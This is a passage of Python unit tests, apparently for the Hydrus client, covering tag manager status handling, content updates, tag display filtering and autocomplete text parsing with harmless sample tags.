service_keys_to_statuses_to_tags[ cls._first_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'current', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1' }
service_keys_to_statuses_to_tags[ cls._first_key ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'deleted', '\u2835' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_DELETED ] = { 'current' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
service_keys_to_statuses_to_tags[ cls._second_key ][ HC.CONTENT_STATUS_PETITIONED ] = { 'petitioned' }
service_keys_to_statuses_to_tags[ cls._third_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'petitioned' }
service_keys_to_statuses_to_tags[ cls._third_key ][ HC.CONTENT_STATUS_DELETED ] = { 'pending' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ cls._first_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'current', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1' }
service_keys_to_statuses_to_display_tags[ cls._first_key ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted' }
service_keys_to_statuses_to_display_tags[ cls._second_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'deleted', '\u2835' }
service_keys_to_statuses_to_display_tags[ cls._second_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
service_keys_to_statuses_to_display_tags[ cls._third_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'petitioned' }
service_keys_to_statuses_to_display_tags[ cls._third_key ][ HC.CONTENT_STATUS_DELETED ] = { 'pending' }
cls._tags_manager = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
cls._service_keys_to_statuses_to_tags = service_keys_to_statuses_to_tags
#
cls._pending_service_key = HydrusData.GenerateKey()
cls._content_update_service_key = HydrusData.GenerateKey()
cls._reset_service_key = HydrusData.GenerateKey()
other_service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
other_service_keys_to_statuses_to_tags[ cls._pending_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
other_service_keys_to_statuses_to_tags[ cls._pending_service_key ][ HC.CONTENT_STATUS_PETITIONED ] = { 'petitioned' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'reset_current' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_DELETED ] = { 'reset_deleted' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'reset_pending' }
other_service_keys_to_statuses_to_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_PETITIONED ] = { 'reset_petitioned' }
other_service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
other_service_keys_to_statuses_to_display_tags[ cls._pending_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'pending' }
other_service_keys_to_statuses_to_display_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_CURRENT ] = { 'reset_current' }
other_service_keys_to_statuses_to_display_tags[ cls._reset_service_key ][ HC.CONTENT_STATUS_PENDING ] = { 'reset_pending' }
cls._other_tags_manager = ClientMediaManagers.TagsManager( other_service_keys_to_statuses_to_tags, other_service_keys_to_statuses_to_display_tags )
cls._other_service_keys_to_statuses_to_tags = other_service_keys_to_statuses_to_tags
def test_delete_pending( self ):
self.assertEqual( self._other_tags_manager.GetPending( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
self._other_tags_manager.DeletePending( self._pending_service_key )
self.assertEqual( self._other_tags_manager.GetPending( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._pending_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
def test_get_current( self ):
self.assertEqual( self._tags_manager.GetCurrent( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'current', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1' } )
self.assertEqual( self._tags_manager.GetCurrent( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'deleted', '\u2835' } )
self.assertEqual( self._tags_manager.GetCurrent( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
self.assertEqual( self._tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'current', 'deleted', '\u2835', 'creator:tsutomu nihei', 'series:blame!', 'title:test title', 'volume:3', 'chapter:2', 'page:1', 'petitioned' } )
def test_get_deleted( self ):
self.assertEqual( self._tags_manager.GetDeleted( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'deleted' } )
self.assertEqual( self._tags_manager.GetDeleted( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'current' } )
self.assertEqual( self._tags_manager.GetDeleted( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
self.assertEqual( self._tags_manager.GetDeleted( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'deleted', 'current', 'pending' } )
def test_get_namespace_slice( self ):
self.assertEqual( self._tags_manager.GetNamespaceSlice( ( 'creator', 'series' ), ClientTags.TAG_DISPLAY_ACTUAL ), frozenset( { 'creator:tsutomu nihei', 'series:blame!' } ) )
self.assertEqual( self._tags_manager.GetNamespaceSlice( [], ClientTags.TAG_DISPLAY_ACTUAL ), frozenset() )
def test_get_num_tags( self ):
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 8 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._first_key, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 8 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 2 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._second_key, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 3 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = self._third_key, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = False, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 0 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = True, include_pending_tags = False ), ClientTags.TAG_DISPLAY_STORAGE ), 10 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = False, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 1 )
self.assertEqual( self._tags_manager.GetNumTags( ClientSearch.TagSearchContext( service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = True, include_pending_tags = True ), ClientTags.TAG_DISPLAY_STORAGE ), 11 )
def test_get_pending( self ):
self.assertEqual( self._tags_manager.GetPending( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPending( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
self.assertEqual( self._tags_manager.GetPending( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
def test_get_petitioned( self ):
self.assertEqual( self._tags_manager.GetPetitioned( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPetitioned( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
self.assertEqual( self._tags_manager.GetPetitioned( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPetitioned( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
def test_get_service_keys_to_statuses_to_tags( self ):
s = self._tags_manager.GetServiceKeysToStatusesToTags( ClientTags.TAG_DISPLAY_STORAGE )
self.assertEqual( s[ self._first_key ], self._service_keys_to_statuses_to_tags[ self._first_key ] )
self.assertEqual( s[ self._second_key ], self._service_keys_to_statuses_to_tags[ self._second_key ] )
self.assertEqual( s[ self._third_key ], self._service_keys_to_statuses_to_tags[ self._third_key ] )
def test_get_statuses_to_tags( self ):
self.assertEqual( self._tags_manager.GetStatusesToTags( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), self._service_keys_to_statuses_to_tags[ self._first_key ] )
self.assertEqual( self._tags_manager.GetStatusesToTags( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), self._service_keys_to_statuses_to_tags[ self._second_key ] )
self.assertEqual( self._tags_manager.GetStatusesToTags( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), self._service_keys_to_statuses_to_tags[ self._third_key ] )
def test_has_tag( self ):
self.assertTrue( self._tags_manager.HasTag( '\u2835', ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertFalse( self._tags_manager.HasTag( 'not_exist', ClientTags.TAG_DISPLAY_STORAGE ) )
def test_process_content_update( self ):
hashes = { HydrusData.GenerateKey() for i in range( 6 ) }
#
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE, ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_DELETE, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PEND, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_RESCIND_PEND, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PEND, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_ADD, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PETITION, ( 'hello', hashes ), reason = 'reason' )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_RESCIND_PETITION, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PETITION, ( 'hello', hashes ), reason = 'reason' )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_DELETE, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
def test_reset_service( self ):
self.assertEqual( self._other_tags_manager.GetCurrent( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_current' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_deleted' } )
self.assertEqual( self._other_tags_manager.GetPending( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_pending' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_petitioned' } )
self._other_tags_manager.ResetService( self._reset_service_key )
self.assertEqual( self._other_tags_manager.GetCurrent( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
class TestTagDisplayManager( unittest.TestCase ):
def test_tag_filtering( self ):
filter_pages = HydrusTags.TagFilter()
filter_pages.SetRule( 'page:', HC.FILTER_BLACKLIST )
tag_display_manager = ClientTagsHandling.TagDisplayManager()
tag_display_manager.SetTagFilter( ClientTags.TAG_DISPLAY_SELECTION_LIST, CC.COMBINED_TAG_SERVICE_KEY, filter_pages )
tags = { 'character:samus aran', 'series:metroid', 'page:17' }
#
self.assertFalse( tag_display_manager.FiltersTags( ClientTags.TAG_DISPLAY_STORAGE, CC.COMBINED_TAG_SERVICE_KEY ) )
storage_tags = tag_display_manager.FilterTags( ClientTags.TAG_DISPLAY_STORAGE, CC.COMBINED_TAG_SERVICE_KEY, tags )
self.assertEqual( storage_tags, tags )
#
self.assertTrue( tag_display_manager.FiltersTags( ClientTags.TAG_DISPLAY_SELECTION_LIST, CC.COMBINED_TAG_SERVICE_KEY ) )
selection_tags = tag_display_manager.FilterTags( ClientTags.TAG_DISPLAY_SELECTION_LIST, CC.COMBINED_TAG_SERVICE_KEY, tags )
self.assertTrue( len( selection_tags ) < len( tags ) )
self.assertEqual( selection_tags, filter_pages.Filter( tags ) )
class TestTagObjects( unittest.TestCase ):
def test_parsed_autocomplete_text( self ):
def bool_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.IsAcceptableForFileSearches(), values[0] )
self.assertEqual( pat.IsAcceptableForTagSearches(), values[1] )
self.assertEqual( pat.IsEmpty(), values[2] )
self.assertEqual( pat.IsExplicitWildcard(), values[3] )
self.assertEqual( pat.IsNamespaceSearch(), values[4] )
self.assertEqual( pat.IsTagSearch(), values[5] )
self.assertEqual( pat.inclusive, values[6] )
def search_text_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.GetSearchText( False ), values[0] )
self.assertEqual( pat.GetSearchText( True ), values[1] )
def read_predicate_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.GetImmediateFileSearchPredicate(), values[0] )
self.assertEqual( pat.GetNonTagFileSearchPredicates(), values[1] )
def write_predicate_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.GetAddTagPredicate(), values[0] )
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ '', '' ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
search_text_tests( parsed_autocomplete_text, [ '', '' ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, False ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus', inclusive = False ), [] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus*', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'samus*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'samus*' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'character:samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'character:samus', 'character:samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-character:samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, False ] )
search_text_tests( parsed_autocomplete_text, [ 'character:samus', 'character:samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus', inclusive = False ), [] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 's*s', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 's*s', 's*s*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-s*s', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, False ] )
search_text_tests( parsed_autocomplete_text, [ 's*s', 's*s*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*', inclusive = False ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*', inclusive = False ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s', inclusive = False ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'metroid:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, True ] )
